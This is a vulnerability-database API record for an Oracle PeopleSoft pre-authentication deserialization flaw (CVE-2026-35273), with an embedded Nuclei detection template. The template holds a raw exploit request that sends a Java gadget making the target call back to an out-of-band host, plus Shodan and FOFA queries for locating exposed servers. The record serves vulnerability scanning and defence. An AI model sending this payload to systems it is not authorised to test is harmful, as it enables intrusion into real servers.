{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2026-35273/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2026-35273/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2026-35273/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2026-35273/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2026-35273/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2026-35273"},"sightings":{"href":"/api/v1/sightings/cve-2026-35273"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2026/CVE-2026-35273.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2026-35273\n\ninfo:\n  name: Oracle PeopleSoft PeopleTools PSEMHUB - Pre-Auth Java Deserialization RCE\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Oracle PeopleSoft PeopleTools 8.61 and 8.62 contain a remote code execution vulnerability in Updates Environment Management, letting unauthenticated network attackers fully compromise the system, exploit requires network access via HTTP.\n  impact: |\n    Unauthenticated attackers can fully compromise PeopleSoft Enterprise PeopleTools, leading to complete system takeover.\n  remediation: |\n    Update to the latest available version beyond 8.62.\n  reference:\n    - https://www.oracle.com/security-alerts/alert-cve-2026-35273.html\n    - https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit\n    - https://www.rapid7.com/blog/post/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-35273\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-35273\n    epss-score: 0.95473\n    epss-percentile: 0.99869\n    cwe-id: CWE-502\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: oracle\n    product: peoplesoft_enterprise_peopletools\n    shodan-query: http.html:\"PeopleSoft\"\n    fofa-query: body=\"PeopleSoft Environment Management Hub\"\n  tags: cve,cve2026,oracle,peoplesoft,deserialization,rce,kev,oast,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /PSEMHUB/hub HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        OPERATION={{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'rO0ABX')\"\n          - \"contains(interactsh_protocol, 'dns')\"\n        condition: and\n# digest: 490a0046304402207d315dd68f35151080886f9d8743ba2c3cdfbbf2603d55c79ea5e544be972aa2022027e8fe6a5ed32728b6bc168d3ef7d94bd033a3589e03ab4b73d2c5be98781d7b:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2026-35273"}